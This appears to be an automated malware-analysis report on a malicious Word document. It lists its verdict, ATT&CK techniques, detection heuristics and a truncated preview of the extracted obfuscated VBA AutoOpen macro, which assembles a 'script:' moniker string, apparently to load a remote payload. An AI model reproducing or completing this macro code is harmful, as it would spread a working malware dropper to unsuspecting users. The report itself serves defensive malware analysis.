Verdict: MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a legacy WordBasic AutoOpen macro. The VBA code is heavily obfuscated, but the presence of GetObject and AutoOpen heuristics indicates an attempt to execute arbitrary code. This macro likely serves to download and execute a secondary payload, a common technique for initial compromise.
Heuristics (7)

- ClamAV: Doc.Malware.Generic-6668084-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6668084-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39948 bytes |

SHA-256: f49aee159e400a8f568f7e0b5b7e5fad9315e96d142db76101c8b627abce387d

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub hAAvAQyvE()
Dim BOgYjIwEfIR
BOgYjIwEfIR = Rnd(1310)
If BOgYjIwEfIR > 53044 Then
BOgYjIwEfIR = Exp(10)
End If
kuDjIiYaiKU = InStr("ZIVubeNsIMOhaaOBOSadon", "ZIVubeNsIMOhaaOBOSadonZIVubeNsIMOhaaOBOSadon")
WifAaUQARATUraDyniSad = Val("94369.3") & "jyjYLiSiwtEg"
Dim waBiTdMOmUwCoBOFuhuPi
Dim aYNOvTiSIGoSILiK
aYNOvTiSIGoSILiK = Rnd(123)
If aYNOvTiSIGoSILiK > 2893 Then
aYNOvTiSIGoSILiK = Exp(3)
End If
mUQOpiCyWaHIbYLOr = Val("9767.4") & "tiKUguCisAXEFYxYRy"
waBiTdMOmUwCoBOFuhuPi = Log(4)
cuTuCOVURyN = InStr("cuhAryHaROpidaPI", "cuhAryHaROpidaPIcuhAryHaROpidaPI")
waBiTdMOmUwCoBOFuhuPi = waBiTdMOmUwCoBOFuhuPi + Log(10)
ReTawHIGULIFoGhY = Val("7000.3") & "mOsoxOHiDeLuC"
Dim PodoaICyievUvAxiRi
xUpOAFehaxyLEzecY = InStr("NUMOCUtoBItIBIN", "NUMOCUtoBItIBINNUMOCUtoBItIBIN")
For PodoaICyievUvAxiRi = 4 To 13
Dim hIGyiOcoKoFUfIbEl
For hIGyiOcoKoFUfIbEl = 9 To 12
Dim iYbOGUQixociXOTamU
iYbOGUQixociXOTamU = Fix(38241)
Next
Dim BORrOwaFylBujEtItYVLi
BORrOwaFylBujEtItYVLi = Fix(67835)
Next
tyDAFAMeSAryNe = Val("91603.6") & "kiidaKimAiIsAsIF"
End Sub
Sub AutoOpen()
MiXabUFeqeHePmujeph = 9407
QyBESEawycETyVyynyKe = 45686
xiscugObSuDYXARO = InStr("tiXYLUhypasIRISO", "tiXYLUhypasIRISOtiXYLUhypasIRISO")
Dim dYZaCUCEsUJEnEQEBA
dYZaCUCEsUJEnEQEBA = Rnd(128)
If dYZaCUCEsUJEnEQEBA > 75609 Then
dYZaCUCEsUJEnEQEBA = Exp(8)
End If
Dim GyrAMAWEZOtYRYNbokO
GyrAMAWEZOtYRYNbokO = Rnd(105)
If GyrAMAWEZOtYRYNbokO > 49625 Then
GyrAMAWEZOtYRYNbokO = Exp(5)
End If
On Error Resume Next
JAhAJeriObavYJiTeNogALa = Val("82235.5") & "BaiEwEdABoSuFOF"
Dim cOKOZubOvIwit
cOKOZubOvIwit = Log(9)
cOKOZubOvIwit = cOKOZubOvIwit + Log(10)
Dim wiiEXAqTiH
SIQEKuPakmuVis = Val("35755.8") & "naoKeWoKoMApAVOBavIH"
wiiEXAqTiH = Rnd(114)
If wiiEXAqTiH > 43903 Then
Dim WtuTehUCAGoWINErAM
WtuTehUCAGoWINErAM = Log(10)
WtuTehUCAGoWINErAM = WtuTehUCAGoWINErAM + Log(11)
wiiEXAqTiH = Exp(4)
End If
Dim QJYSatUNOWVEXhYC
QJYSatUNOWVEXhYC = Log(4)
QJYSatUNOWVEXhYC = QJYSatUNOWVEXhYC + Log(12)
TUpiniBILyseQEMNu = InStr("GIKYkehylEvoC", "GIKYkehylEvoCGIKYkehylEvoC")
vYbIdUpesUF = InStr("ZypYRteztulegBOHePiC", "ZypYRteztulegBOHePiCZypYRteztulegBOHePiC")
riJdariFeKIB = StrReverse(LTrim(""))
PAROPALiVxobEmzady = InStr("roRIauQUbYjOjIdETALaL", "roRIauQUbYjOjIdETALaLroRIauQUbYjOjIdETALaL")
GKUtAkuTyxIrDja = Val("48740.8") & "QEsGEmukenpaGIqIQ"
riJdariFeKIB = riJdariFeKIB + IIf((9 + 18) = 27, "sc", "OxPW")
Debug.Print "DUQIgiKASHomYcEi"
raCYViMAVexuMa = 84635
Dim CImeDyuiIiitIsYxOLJYti
For CImeDyuiIiitIsYxOLJYti = 5 To 10
Dim fEBeVYpAdEkoZBEWUtIc
fEBeVYpAdEkoZBEWUtIc = Fix(88643)
Next
hegAvoVygoLOfXIbySaFacE = 26520
zImASafOsIaeSy = Val("80777.2") & "xELuKobOQULyzakOguTOVYp"
riJdariFeKIB = riJdariFeKIB + IIf((312 + 624) = 936, "ri", "L")
SaHseheBaOJ = Val("65783.3") & "DarInYrIwUZ"
fEnAwIwIbicy = 61648
PNeFEjEqUbURIN = 55530
gaXOGAfAVuWeaewOmEqilO = InStr("HOBAReFoTECkrORIwYnet", "HOBAReFoTECkrORIwYnetHOBAReFoTECkrORIwYnet")
eBEiYvAVuCSUQoMIM = 46041
Debug.Print "TyPUhAcUjaFYJUKogAfLY"
Dim FSoHehagAkUr
For FSoHehagAkUr = 5 To 11
Dim pitowIDiCeWUMol
pitowIDiCeWUMol = Fix(1069)
Next
riJdariFeKIB = riJdariFeKIB + IIf((78 + 156) = 234, "pt", "kJx")
Debug.Print "RoFUWOLuzIiAFYmIJaoq"
Dim FIaoiAJipuToS
For FIaoiAJipuToS = 10 To 11
Dim XyPuGEJekyV
XyPuGEJekyV = Fix(99611)
Next
Dim ZIcyZUSALOJ
ZIcyZUSALOJ = Log(9)
ZIcyZUSALOJ = ZIcyZUSALOJ + Log(13)
LEDucuiyFOPIBIhutomA = InStr("HUboCYaEceBoqUDaKIl", "HUboCYaEceBoqUDaKIlHUboCYaEceBoqUDaKIl")
fuSidIXyFICIY = 67673
riJdariFeKIB = riJdariFeKIB + IIf((294 + 588) = 882, ":h", "6ZmTO")
Dim VOhoCQEXUQAzAZo
For VOhoCQEXUQAzAZo = 2 To 11
Dim lIaevUVoMES
lIaevUVoMES = Fix(10564)
Next
Dim wLOjE
... (truncated)